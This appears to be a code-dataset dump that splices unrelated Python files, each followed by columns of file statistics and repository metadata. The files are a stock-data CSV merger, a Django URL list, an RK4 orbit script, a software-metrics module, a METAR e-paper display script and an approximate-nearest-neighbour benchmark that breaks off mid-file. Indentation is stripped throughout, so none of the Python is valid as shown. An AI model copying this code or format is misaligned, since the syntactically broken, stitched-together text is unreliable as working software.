df_163 = pd.read_csv(path_163, dtype=str)
df_163 = time_index_df(df_163)
if 'factor' in df_163.columns:
df = df_163[df_163['factor'].isna()]
if df.empty:
logger.info("{} 163 factor is ok", security_item['code'])
return
path_sina = get_kdata_path(security_item, source='sina', fuquan='hfq')
df_sina = pd.read_csv(path_sina, dtype=str)
df_sina = time_index_df(df_sina)
df_163['factor'] = df_sina['factor']
df_163.to_csv(path_163, index=False)
def merge_kdata_to_one(security_item=None, replace=False, fuquan='bfq'):
if security_item is not None:  # comparing type() to the string 'NoneType' was always true
items = pd.DataFrame().append(security_item).iterrows()
else:
items = get_security_list().iterrows()
if fuquan:
fuquans = [fuquan]
else:
fuquans = ['bfq', 'hfq']
for index, security_item in items:
for fuquan in fuquans:
dayk_path = get_kdata_path(security_item, source='sina', fuquan=fuquan)
if fuquan == 'hfq':
df = pd.DataFrame(
columns=data_contract.KDATA_COLUMN_FQ)
else:
df = pd.DataFrame(
columns=data_contract.KDATA_COLUMN)
the_dir = get_kdata_dir(security_item, fuquan=fuquan)
if os.path.exists(the_dir):
files = [os.path.join(the_dir, f) for f in os.listdir(the_dir) if
('dayk.csv' not in f and os.path.isfile(os.path.join(the_dir, f)))]
for f in files:
df = df.append(pd.read_csv(f, dtype=str), ignore_index=True)
if df.size > 0:
df = df.set_index(df['timestamp'])
df.index = pd.to_datetime(df.index)
df = df.sort_index()
logger.info("{} to {}".format(security_item['code'], dayk_path))
if replace:
df.to_csv(dayk_path, index=False)
else:
merge_to_current_kdata(security_item, df, fuquan=fuquan)
for f in files:
logger.info("remove {}".format(f))
os.remove(f)
if fuquan == 'hfq':
add_factor_to_163(security_item)
if __name__ == '__main__':
print(get_security_list(security_type='stock', exchanges=['nasdaq'], codes=US_STOCK_CODES))
# item = {"code": "000001", "type": "stock", "exchange": "sz"}
# assert kdata_exist(item, 1991, 2) == True
# assert kdata_exist(item, 1991, 3) == True
# assert kdata_exist(item, 1991, 4) == True
# assert kdata_exist(item, 1991, 2) == True
# assert kdata_exist(item, 1990, 1) == False
# assert kdata_exist(item, 2017, 1) == False
#
# df1 = get_kdata(item,
# datetime.datetime.strptime('1991-04-01', settings.TIME_FORMAT_DAY),
# datetime.datetime.strptime('1991-12-31', settings.TIME_FORMAT_DAY))
# df1 = df1.set_index(df1['timestamp'])
# df1 = df1.sort_index()
# print(df1)
#
# df2 = tdx.get_tdx_kdata(item, '1991-04-01', '1991-12-31')
# df2 = df2.set_index(df2['timestamp'], drop=False)
# df2 = df2.sort_index()
# print(df2)
#
# for _, data in df1.iterrows():
# if data['timestamp'] in df2.index:
# data2 = df2.loc[data['timestamp']]
# assert data2["low"] == data["low"]
# assert data2["open"] == data["open"]
# assert data2["high"] == data["high"]
# assert data2["close"] == data["close"]
# assert data2["volume"] == data["volume"]
# try:
# assert data2["turnover"] == data["turnover"]
# except Exception as e:
# print(data2["turnover"])
# print(data["turnover"])
| 32.89755
| 115
| 0.580326
| 1,894
| 14,771
| 4.318374
| 0.121964
| 0.102702
| 0.019562
| 0.011737
| 0.346253
| 0.304194
| 0.247708
| 0.203815
| 0.158088
| 0.13608
| 0
| 0.019845
| 0.300657
| 14,771
| 448
| 116
| 32.970982
| 0.771926
| 0.209464
| 0
| 0.233871
| 0
| 0
| 0.048942
| 0
| 0
| 0
| 0
| 0.002232
| 0
| 1
| 0.060484
| false
| 0
| 0.048387
| 0
| 0.201613
| 0.004032
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c3f46d21ba0b951765c196ff37b42684f836343
| 432
|
py
|
Python
|
backend/jobPortal/api/urls.py
|
KshitijDarekar/hackViolet22
|
c54636d3044e1d9a7d8fa92a4d781e79f38af3ca
|
[
"MIT"
] | 2
|
2022-02-06T04:58:24.000Z
|
2022-02-06T05:31:18.000Z
|
backend/jobPortal/api/urls.py
|
KshitijDarekar/hackViolet22
|
c54636d3044e1d9a7d8fa92a4d781e79f38af3ca
|
[
"MIT"
] | 5
|
2022-02-06T05:08:04.000Z
|
2022-02-06T16:29:51.000Z
|
backend/jobPortal/api/urls.py
|
KshitijDarekar/hackViolet22
|
c54636d3044e1d9a7d8fa92a4d781e79f38af3ca
|
[
"MIT"
] | 2
|
2022-02-06T04:58:43.000Z
|
2022-02-06T17:56:23.000Z
|
from django.urls import path
from . import views
# Refer to the corresponding view function for more details of the url routes
urlpatterns = [
path('', views.getRoutes, name="index"),
path('add/', views.addJob, name="addJob" ),
path('delete/<int:id>', views.removeJob, name="removeJob" ),
path('get-jobs/', views.getJobs, name='getJobs'),
path('company/jobs/', views.getCompanyJobs, name='getCompanyJobs'),
]
| 33.230769
| 77
| 0.685185
| 55
| 432
| 5.381818
| 0.6
| 0.060811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152778
| 432
| 12
| 78
| 36
| 0.808743
| 0.173611
| 0
| 0
| 0
| 0
| 0.230986
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.222222
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c4027e0a85dd326115e24d1e6e1369d17bbdebc
| 3,135
|
py
|
Python
|
rh_project/pick_six.py
|
hrichstein/phys_50733
|
a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b
|
[
"MIT"
] | null | null | null |
rh_project/pick_six.py
|
hrichstein/phys_50733
|
a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b
|
[
"MIT"
] | null | null | null |
rh_project/pick_six.py
|
hrichstein/phys_50733
|
a333bfa4dd5b0ca464bd861336bc2f32d8e72a2b
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
# from scipy.constants import G
# Setting plotting parameters
from matplotlib import rc,rcParams
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rc('font', **{'family': 'serif', 'serif':['Computer Modern']})
def find_vel_init(M1, M2, a):
period = np.sqrt(4 * np.pi**2 * a**3 / G / (M1 + M2))  # period in years (G is in AU^3 yr^-2 M_sun^-1)
print("Period is {0:.3f} years".format(period))
v = 2 * np.pi * a / period # AU/year
print(v)
return v
# def rk4_func(params):
# s1, s2, p, vs1, vs2, vp = params
# s1x, s1y = s1
# s2x, s2y = s2
# px, py = p
# # s1_vx, s1_vy = vs1
# # s2_vx, s2_vy = vs2
# # p_vx, p_vy = vp
# a1x = -G * red_mass * 0.1 / np.sqrt(0.1)**3
# a1y = -G * red_mass * 0 / np.sqrt(0.1)**3
# # R1px = abs(s1x - px)
# # R1py = abs(s1y - py)
# # R2px = abs(s2x - px)
# # R2py = abs(s2y - py)
# # R12x = abs(s1x - s2x)
# # R12y = abs(s1y - s2y)
# # R1p = np.sqrt((s1x - px)**2 + (s1y - py)*2)
# # R2p = np.sqrt((s2x - px)**2 + (s2y - py)*2)
# # R12 = A # global variable
# # a1_2x = -G * M1 * R12x / R12**3
# # a1_2y = -G * M1 * R12y / R12**3
# # a2_1x = -G * M2 * R12x
def ghetto(arr):
x, y, vx, vy = arr
ax = -G * red_mass * x / np.sqrt(x**2 + y**2)**3
# ax += -G * M1 *
ay = -G * red_mass * y / np.sqrt(x**2 + y**2)**3
ac_arr = np.array([ax, ay], float)
# print(x)
return np.array([vx, vy, ax, ay])
# Constants
G = 4 * np.pi**2 # AU^3 yr^-2 M_sun^-1
A = 0.2 # AU
r = A/2 # semi-major axis & radius
test_plan = 1 # AU
a = 0
b = .02
N = 100000
h = (b-a)/N
M1 = 1
M2 = 1
red_mass = M1*M2/(M1+M2)
tpoints = np.arange(a, b, h)  # no dtype=int: an integer dtype would truncate the fractional step to zero
s1 = np.array([r, 0], float)
s2 = np.array([-r,0], float)
p = np.array([test_plan, 0], float)
s_vel = find_vel_init(M1, red_mass, r)
# s_vel = np.sqrt(10*G*red_mass)
p_vel = find_vel_init(red_mass, 0, test_plan)
print(s_vel)
s1_v0 = np.array([0, s_vel], float)
s2_v0 = np.array([0, -s_vel], float)
p_v0 = np.array([0, p_vel], float)
all_params = np.array([s1, s2, p, s1_v0, s2_v0, p_v0])
xpts_s1 = [[] for tt in range(len(tpoints))]
ypts_s1 = [[] for tt in range(len(tpoints))]
xpts_s2 = [[] for tt in range(len(tpoints))]
ypts_s2 = [[] for tt in range(len(tpoints))]
xpts_p = [[] for tt in range(len(tpoints))]
ypts_p = [[] for tt in range(len(tpoints))]
s_ghet = np.array([s1[0], s1[1], s1_v0[0], s1_v0[1]])
for tt in range(len(tpoints)):
xpts_s1[tt] = s_ghet[0]
ypts_s1[tt] = s_ghet[1]
k1 = h * ghetto(s_ghet)
k2 = h * ghetto(s_ghet + 0.5*k1)
k3 = h * ghetto(s_ghet + 0.5*k2)
k4 = h * ghetto(s_ghet + k3)
s_ghet += (k1 + 2*k2 + 2*k3 + k4) / 6
# print(s_ghet[0])
plt.plot(xpts_s1, ypts_s1)
plt.show()
# def f(s,t):
# x, y, vx, vy = s
# R = np.sqrt(x**2 + y**2)
# ax = (-GMsun * x )/R ** 3
# ay = (-GMsun * y )/R ** 3
# return np.array([vx, vy, ax, ay])
# r0 = np.array([r, 0.0], float)
# v0 = np.array([0, -s_vel], float)
# s = np.array([r0[0], r0[1], v0[0], v0[1]])
# for tt in :
# solution[j] = s
# k1 = h*f(s,t)
# k2 = h*f(s+0.5*k1,t+0.5*h)
# k3 = h*f(s+0.5*k2,t+0.5*h)
# k4 = h*f(s+k3,t+h)
# s += (k1+2*k2+2*k3+k4)/6
| 19.59375
| 71
| 0.551515
| 631
| 3,135
| 2.637084
| 0.229794
| 0.058894
| 0.033654
| 0.050481
| 0.263221
| 0.221755
| 0.198918
| 0
| 0
| 0
| 0
| 0.091732
| 0.224561
| 3,135
| 160
| 72
| 19.59375
| 0.59276
| 0.388517
| 0
| 0
| 0
| 0
| 0.04
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034483
| false
| 0
| 0.051724
| 0
| 0.12069
| 0.051724
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c42036c78c029c70b9f27f5eeeede981c311ba5
| 1,704
|
py
|
Python
|
recoda/analyse/python/metrics.py
|
hansendx/recoda
|
09e25843376613b17c6b42d45e30b895b24a7d9d
|
[
"MIT"
] | null | null | null |
recoda/analyse/python/metrics.py
|
hansendx/recoda
|
09e25843376613b17c6b42d45e30b895b24a7d9d
|
[
"MIT"
] | null | null | null |
recoda/analyse/python/metrics.py
|
hansendx/recoda
|
09e25843376613b17c6b42d45e30b895b24a7d9d
|
[
"MIT"
] | null | null | null |
""" Provides functionality to calculate software metrics in python projects.
"""
from recoda.analyse.python import (
_general,
_installability,
_understandability,
_verifiability,
_correctness,
)
from recoda.analyse.independent import (
learnability,
openness
)
# pylint: disable-msg=c0103
# For now this seems to be the most streamlined way to decentralize this
# module. We want to expose every function through this metrics module without
# making it long and unreadable; wrapping the private module functions in
# barebones wrappers would only add unnecessary code.
# Installability related metrics.
#packageability = _installability.packageability
packageability = _installability.packageability
requirements_declared = _installability.requirements_declared
docker_setup = _installability.docker_setup
singularity_setup = _installability.singularity_setup
# Learnability related metrics.
project_readme_size = learnability.project_readme_size
project_doc_size = learnability.project_doc_size
flesch_reading_ease = learnability.flesch_reading_ease
flesch_kincaid_grade = learnability.flesch_kincaid_grade
readme_flesch_reading_ease = learnability.readme_flesch_reading_ease
readme_flesch_kincaid_grade = learnability.readme_flesch_kincaid_grade
# Understandability related metrics.
average_comment_density = _understandability.average_comment_density
standard_compliance = _understandability.standard_compliance
# Openness related metrics.
license_type = openness.license_type
testlibrary_usage = _verifiability.testlibrary_usage
# Correctness related metrics.
error_density = _correctness.error_density
# General
loc = _general.count_loc
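# Usage sketch (not part of the original module): the re-exported callables
# are applied to a project path. The exact signatures live in the private
# submodules, so the path argument here is an assumption for illustration.
# from recoda.analyse.python import metrics
# print(metrics.loc('/path/to/project'))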
| 29.894737
| 76
| 0.834507
| 197
| 1,704
| 6.903553
| 0.461929
| 0.051471
| 0.05
| 0.042647
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002667
| 0.119718
| 1,704
| 57
| 77
| 29.894737
| 0.904
| 0.349765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c43222bbb55fdc6b4f2d6c2fab0d2b77fcb11ea
| 3,278
|
py
|
Python
|
metarmap/commands/display.py
|
wastrachan/metarmap
|
2ff9bc3e94d731b83470c2283bfb67600143d719
|
[
"MIT"
] | null | null | null |
metarmap/commands/display.py
|
wastrachan/metarmap
|
2ff9bc3e94d731b83470c2283bfb67600143d719
|
[
"MIT"
] | null | null | null |
metarmap/commands/display.py
|
wastrachan/metarmap
|
2ff9bc3e94d731b83470c2283bfb67600143d719
|
[
"MIT"
] | null | null | null |
import datetime
import os
import textwrap
import click
from PIL import Image, ImageDraw, ImageFont
from metarmap.configuration import config, debug, get_display_lock_content, set_display_lock_content
from metarmap.libraries.aviationweather import metar
from metarmap.libraries.waveshare_epd import epd2in13_V2
FONTDIR = os.path.abspath('/usr/share/fonts/truetype/freefont/')
FONT = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 13)
FONT_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 13)
FONT_TITLE = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSans.ttf'), 15)
FONT_TITLE_BOLD = ImageFont.truetype(os.path.join(FONTDIR, 'FreeSansBold.ttf'), 15)
@click.command()
def clear_display():
""" Clear the ePaper display """
debug('Clear e-paper display')
epd = epd2in13_V2.EPD()
epd.init(epd.FULL_UPDATE)
epd.Clear(0xFF)
@click.command()
def update_display():
""" Update the ePaper display with current METAR observation """
# Fetch Observation
station = config['SCREEN'].get('airport', None)
debug(f'Selected airport for e-paper display: {station}')
if not station:
return
try:
observation = metar.retrieve([station, ])[0]
debug(f'Fetched latest weather for station {station}')
except IndexError:
debug(f'Weather not found for station {station}')
return
# Convert observation time to local (system) timezone
timezone = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
timezone_name = datetime.datetime.now(datetime.timezone.utc).astimezone().tzname()
observation_time_local = observation.get('observation_time').astimezone(timezone)
# Test observation_time, do not update display if weather observation is not new
new_lock = f'{station}{observation.get("observation_time")}'
old_lock = get_display_lock_content()
if new_lock == old_lock:
debug(f'New weather {new_lock} is the same as old weather {old_lock}. Not updating e-ink display')
return
debug(f'New weather {new_lock} supersedes old weather {old_lock}. Saving in lockfile.')
set_display_lock_content(new_lock)
# Initialize Display
debug('Initialize e-paper display')
epd = epd2in13_V2.EPD()
display_width = epd.height
display_height = epd.width
epd.init(epd.FULL_UPDATE)
image = Image.new('1', (display_width, display_height), 255) # 255: clear the frame
draw = ImageDraw.Draw(image)
# Title
debug('Draw title on e-paper display')
draw.rectangle(((0, 0), (display_width / 2, 22)), fill=0)
draw.text((2, 0), f'METAR {station}', font=FONT_TITLE_BOLD, fill=255)
msg = observation_time_local.strftime('%m/%d/%y %H:%M') + timezone_name[0]
w, h = FONT_TITLE.getsize(msg)
draw.text(((display_width - w - 2), 0), msg, font=FONT_TITLE)
draw.line(((0, 22), (display_width, 22)), fill=0, width=1)
# METAR Text
debug('Write raw METAR text to e-paper display')
line_pos = 40
msg = observation.get('raw_text')
w, h = FONT.getsize(msg)
for line in textwrap.wrap(msg, width=34):
draw.text((0, line_pos), line, font=FONT)
line_pos += h + 3
debug('Flush buffered image to e-paper display')
epd.display(epd.getbuffer(image))
| 38.116279
| 106
| 0.701647
| 457
| 3,278
| 4.908096
| 0.293217
| 0.01605
| 0.034775
| 0.041017
| 0.194383
| 0.176549
| 0.156041
| 0.087383
| 0.047258
| 0
| 0
| 0.020679
| 0.173887
| 3,278
| 85
| 107
| 38.564706
| 0.807607
| 0.088469
| 0
| 0.140625
| 0
| 0
| 0.219939
| 0.027282
| 0
| 0
| 0.001347
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.125
| 0
| 0.203125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3c460fdfda615228be90ea72ed8b2f5c151649c7
| 16,921
|
py
|
Python
|
benchmarks/benchmark_script.py
|
oddconcepts/n2o
|
fe6214dcc06a1b13be60733c53ac25bca3c2b4d0
|
[
"Apache-2.0"
] | 2
|
2019-02-13T12:59:27.000Z
|
2020-01-28T02:02:47.000Z
|
benchmarks/benchmark_script.py
|
oddconcepts/n2o
|
fe6214dcc06a1b13be60733c53ac25bca3c2b4d0
|
[
"Apache-2.0"
] | 2
|
2019-06-25T10:00:57.000Z
|
2019-10-26T14:55:23.000Z
|
benchmarks/benchmark_script.py
|
oddconcepts/n2o
|
fe6214dcc06a1b13be60733c53ac25bca3c2b4d0
|
[
"Apache-2.0"
] | 1
|
2021-11-03T14:59:27.000Z
|
2021-11-03T14:59:27.000Z
|
# This code is based on the code
# from ann-benchmark repository
# created by Erik Bernhardsson
# https://github.com/erikbern/ann-benchmarks
import gzip
import numpy
import time
import os
import multiprocessing
import argparse
import pickle
import resource
import random
import math
import logging
import shutil
import subprocess
import sys
import tarfile
from contextlib import closing
try:
xrange
except NameError:
xrange = range
try:
from urllib2 import urlopen
except ImportError:
from urllib.request import urlopen
from n2 import HnswIndex
n2_logger = logging.getLogger("n2_benchmark")
n2_logger.setLevel(logging.INFO)
# Set resource limits to prevent memory bombs
memory_limit = 12 * 2**30
soft, hard = resource.getrlimit(resource.RLIMIT_DATA)
if soft == resource.RLIM_INFINITY or soft >= memory_limit:
n2_logger.info('resetting memory limit from {0} to {1}. '.format(soft, memory_limit))
resource.setrlimit(resource.RLIMIT_DATA, (memory_limit, hard))
INDEX_DIR = 'indices'
DATA_DIR = './datasets/'
GLOVE_DIR = DATA_DIR + 'glove.txt'
SIFT_DIR = DATA_DIR + 'sift.txt'
YOUTUBE_DIR = DATA_DIR + 'youtube.txt'
class BaseANN(object):
def use_threads(self):
return True
class BruteForceBLAS(BaseANN):
"""kNN search that uses a linear scan = brute force."""
def __init__(self, metric, precision=numpy.float32):
if metric not in ('angular', 'euclidean'):
raise NotImplementedError("BruteForceBLAS doesn't support metric %s" % metric)
self._metric = metric
self._precision = precision
self.name = 'BruteForceBLAS()'
def fit(self, X):
"""Initialize the search index."""
lens = (X ** 2).sum(-1) # precompute (squared) length of each vector
if self._metric == 'angular':
X /= numpy.sqrt(lens)[..., numpy.newaxis] # normalize index vectors to unit length
self.index = numpy.ascontiguousarray(X, dtype=self._precision)
elif self._metric == 'euclidean':
self.index = numpy.ascontiguousarray(X, dtype=self._precision)
self.lengths = numpy.ascontiguousarray(lens, dtype=self._precision)
else:
assert False, "invalid metric" # shouldn't get past the constructor!
def query(self, v, n):
"""Find indices of `n` most similar vectors from the index to query vector `v`."""
v = numpy.ascontiguousarray(v, dtype=self._precision) # use same precision for query as for index
# HACK we ignore query length as that's a constant not affecting the final ordering
if self._metric == 'angular':
# argmax_a cossim(a, b) = argmax_a dot(a, b) / |a||b| = argmin_a -dot(a, b)
dists = -numpy.dot(self.index, v)
elif self._metric == 'euclidean':
# argmin_a (a - b)^2 = argmin_a a^2 - 2ab + b^2 = argmin_a a^2 - 2ab
dists = self.lengths - 2 * numpy.dot(self.index, v)
else:
assert False, "invalid metric" # shouldn't get past the constructor!
indices = numpy.argpartition(dists, n)[:n] # partition-sort by distance, get `n` closest
return sorted(indices, key=lambda index: dists[index]) # sort `n` closest into correct order
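# A quick illustration of the partition-then-sort idiom used in query() above
# (a sketch, not part of the benchmark): numpy.argpartition finds the n
# smallest distances in O(N) without a full sort, then only those n indices
# get sorted.
#   dists = numpy.array([0.9, 0.1, 0.5, 0.3])
#   idx = numpy.argpartition(dists, 2)[:2]       # indices {1, 3} in any order
#   sorted(idx, key=lambda i: dists[i])          # -> [1, 3]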
class N2(BaseANN):
def __init__(self, m, ef_construction, n_threads, ef_search, metric):
self._m = m
self._m0 = m * 2
self._ef_construction = ef_construction
self._n_threads = n_threads
self._ef_search = ef_search
self._index_name = os.path.join(INDEX_DIR, "n2_%s_M%d_efCon%d_n_thread%s_data_size%d" % (args.dataset, m, ef_construction, n_threads, max(args.data_size, 0)))
self.name = "N2_M%d_efCon%d_n_thread%s_efSearch%d" % (m, ef_construction, n_threads, ef_search)
self._metric = metric
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
if self._metric == 'euclidean':
self._n2 = HnswIndex(X.shape[1], 'L2')
else:
self._n2 = HnswIndex(X.shape[1])
if os.path.exists(self._index_name):
n2_logger.info("Loading index from file")
self._n2.load(self._index_name)
else:
n2_logger.info("Index file is not exist: {0}".format(self._index_name))
n2_logger.info("Start fitting")
for i, x in enumerate(X):
self._n2.add_data(x.tolist())
self._n2.build(m=self._m, max_m0=self._m0, ef_construction=self._ef_construction, n_threads=self._n_threads)
self._n2.save(self._index_name)
def query(self, v, n):
return self._n2.search_by_vector(v.tolist(), n, self._ef_search)
def __str__(self):
return self.name
class NmslibReuseIndex(BaseANN):
def __init__(self, metric, method_name, index_param, save_index, query_param):
self._nmslib_metric = {
'angular': 'cosinesimil',
'euclidean': 'l2'}[metric]
self._method_name = method_name
self._save_index = save_index
self._index_param = index_param
self._query_param = query_param
self.name = 'Nmslib(method_name=%s, index_param=%s, query_param=%s)' % (
method_name, index_param, query_param)
self._index_name = os.path.join(
INDEX_DIR, "youtube_nmslib_%s_%s_%s_data_size_%d" %
(self._method_name, metric, '_'.join(
self._index_param), max(args.data_size, 0)))
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
import nmslib
self._index = nmslib.init(
self._nmslib_metric,
[],
self._method_name,
nmslib.DataType.DENSE_VECTOR,
nmslib.DistType.FLOAT)
for i, x in enumerate(X):
nmslib.addDataPoint(self._index, i, x.tolist())
if os.path.exists(self._index_name):
logging.debug("Loading index from file")
nmslib.loadIndex(self._index, self._index_name)
else:
logging.debug("Create Index")
nmslib.createIndex(self._index, self._index_param)
if self._save_index:
nmslib.saveIndex(self._index, self._index_name)
nmslib.setQueryTimeParams(self._index, self._query_param)
def query(self, v, n):
import nmslib
return nmslib.knnQuery(self._index, n, v.tolist())
def freeIndex(self):
import nmslib
nmslib.freeIndex(self._index)
class Annoy(BaseANN):
def __init__(self, metric, n_trees, search_k):
self._n_trees = n_trees
self._search_k = search_k
self._metric = metric
self._index_name = os.path.join(
INDEX_DIR, "youtube_annoy_%s_tree%d_data_size_%d" %
(metric, n_trees, max(args.data_size, 0)))
self.name = 'Annoy(n_trees=%d, search_k=%d)' % (n_trees, search_k)
d = os.path.dirname(self._index_name)
if not os.path.exists(d):
os.makedirs(d)
def fit(self, X):
import annoy
self._annoy = annoy.AnnoyIndex(f=X.shape[1], metric=self._metric)
if os.path.exists(self._index_name):
logging.debug("Loading index from file")
self._annoy.load(self._index_name)
else:
logging.debug("Index file not exist start fitting!!")
for i, x in enumerate(X):
self._annoy.add_item(i, x.tolist())
self._annoy.build(self._n_trees)
self._annoy.save(self._index_name)
def query(self, v, n):
return self._annoy.get_nns_by_vector(v.tolist(), n, self._search_k)
def run_algo(args, library, algo, results_fn):
pool = multiprocessing.Pool()
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state = args.random_state)
pool.close()
pool.join()
t0 = time.time()
algo.fit(X_train)
build_time = time.time() - t0
n2_logger.info('Built index in {0}'.format(build_time))
best_search_time = float('inf')
best_precision = 0.0 # should be deterministic but paranoid
try_count = args.try_count
for i in xrange(try_count): # Do multiple times to warm up page cache, use fastest
results = []
search_time = 0.0
current_query = 1
total_queries = len(queries)
for j in range(total_queries):
v, correct = queries[j]
sys.stdout.write("Querying: %d / %d \r" % (current_query, total_queries))
t0 = time.time()
found = algo.query(v, GT_SIZE)
search_time += (time.time() - t0)
if len(found) < len(correct):
n2_logger.info('found: {0}, correct: {1}'.format(len(found), len(correct)))
current_query += 1
results.append(len(set(found).intersection(correct)))
k = float(sum(results))
search_time /= len(queries)
precision = k / (len(queries) * GT_SIZE)
best_search_time = min(best_search_time, search_time)
best_precision = max(best_precision, precision)
sys.stdout.write('*[%d/%d][algo: %s] search time: %s, precision: %.5f \r' % (i+1, try_count, str(algo), str(search_time), precision))
sys.stdout.write('\n')
output = [library, algo.name, build_time, best_search_time, best_precision]
n2_logger.info(str(output))
f = open(results_fn, 'a')
f.write('\t'.join(map(str, output)) + '\n')
f.close()
n2_logger.info('Summary: {0}'.format('\t'.join(map(str, output))))
def get_dataset(which='glove', data_size=-1, test_size = 10000, random_state = 3):
cache = 'queries/%s-%d-%d-%d.npz' % (which, max(args.data_size, 0), test_size, random_state)
if os.path.exists(cache):
v = numpy.load(cache)
X_train = v['train']
X_test = v['test']
n2_logger.info('{0} {1}'.format(X_train.shape, X_test.shape))
return X_train, X_test
local_fn = os.path.join('datasets', which)
if os.path.exists(local_fn + '.gz'):
f = gzip.open(local_fn + '.gz')
else:
f = open(local_fn + '.txt')
X = []
for i, line in enumerate(f):
v = [float(x) for x in line.strip().split()]
X.append(v)
if data_size != -1 and len(X) == data_size:
break
X = numpy.vstack(X)
import sklearn.cross_validation
# Here Erik is most welcome to use any other random_state
# However, it is best to use a new random seed for each major re-evaluation,
# so that we test on truly blind data.
X_train, X_test = sklearn.cross_validation.train_test_split(X, test_size=test_size, random_state=random_state)
X_train = X_train.astype(numpy.float)
X_test = X_test.astype(numpy.float)
numpy.savez(cache, train=X_train, test=X_test)
return X_train, X_test
def get_queries(args):
n2_logger.info('computing queries with correct results...')
bf = BruteForceBLAS(args.distance)
X_train, X_test = get_dataset(which=args.dataset, data_size=args.data_size, test_size=args.test_size, random_state=args.random_state)
# Prepare queries
bf.fit(X_train)
queries = []
total_queries = len(X_test)
for x in X_test:
correct = bf.query(x, GT_SIZE)
queries.append((x, correct))
sys.stdout.write('computing queries %d/%d ...\r' % (len(queries), total_queries))
sys.stdout.write('\n')
return queries
def get_fn(base, args):
fn = os.path.join(base, args.dataset)
if args.data_size != -1:
fn += '-%d' % args.data_size
if args.test_size != -1:
fn += '-%d' % args.test_size
fn += '-%d' % args.random_state
if os.path.exists(fn + '.gz'):
fn += '.gz'
else:
fn += '.txt'
d = os.path.dirname(fn)
if not os.path.exists(d):
os.makedirs(d)
return fn
def download_file(url, dst):
file_name = url.split('/')[-1]
with closing(urlopen(url)) as res:
with open(dst+"/"+file_name, 'wb') as f:
file_size = int(res.headers["Content-Length"])
sys.stdout.write("Downloading datasets %s\r" % (file_name))
file_size_dl = 0
block_sz = 10240
while True:
buffer = res.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
sys.stdout.write("Downloading datasets %s: %d / %d bytes\r" % (file_name, file_size_dl, file_size))
sys.stdout.write('\n')
if __name__ == '__main__':
global GT_SIZE
parser = argparse.ArgumentParser()
parser.add_argument('--distance', help='Distance metric', default='angular')
parser.add_argument('--try_count', help='Number of test attempts', type=int, default=3)
parser.add_argument('--dataset', help='Which dataset', default='glove')
parser.add_argument('--data_size', help='Maximum # of data points', type=int, default=-1)
parser.add_argument('--test_size', help='Maximum # of data queries', type=int, default=10000)
parser.add_argument('--n_threads', help='Number of threads', type=int, default=10)
parser.add_argument('--random_state', help='Random seed', type=int, default=3)
parser.add_argument('--algo', help='Algorithm', type=str)
args = parser.parse_args()
if not os.path.exists(DATA_DIR):
os.makedirs(DATA_DIR)
numpy.random.seed(args.random_state)
if args.dataset == 'glove':
GT_SIZE = 10
elif args.dataset == 'sift':
GT_SIZE = 10
elif args.dataset == 'youtube':
GT_SIZE = 100
else:
print('Invalid dataset: {}'.format(args.dataset))
exit(0)
print('* GT size: {}'.format(GT_SIZE))
if args.dataset == 'glove' and not os.path.exists(GLOVE_DIR):
download_file("https://s3-us-west-1.amazonaws.com/annoy-vectors/glove.twitter.27B.100d.txt.gz", "datasets")
with gzip.open('datasets/glove.twitter.27B.100d.txt.gz', 'rb') as f_in, open('datasets/glove.twitter.27B.100d.txt', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
subprocess.call("cut -d \" \" -f 2- datasets/glove.twitter.27B.100d.txt > datasets/glove.txt", shell=True)
if args.dataset == 'sift' and not os.path.exists(SIFT_DIR):
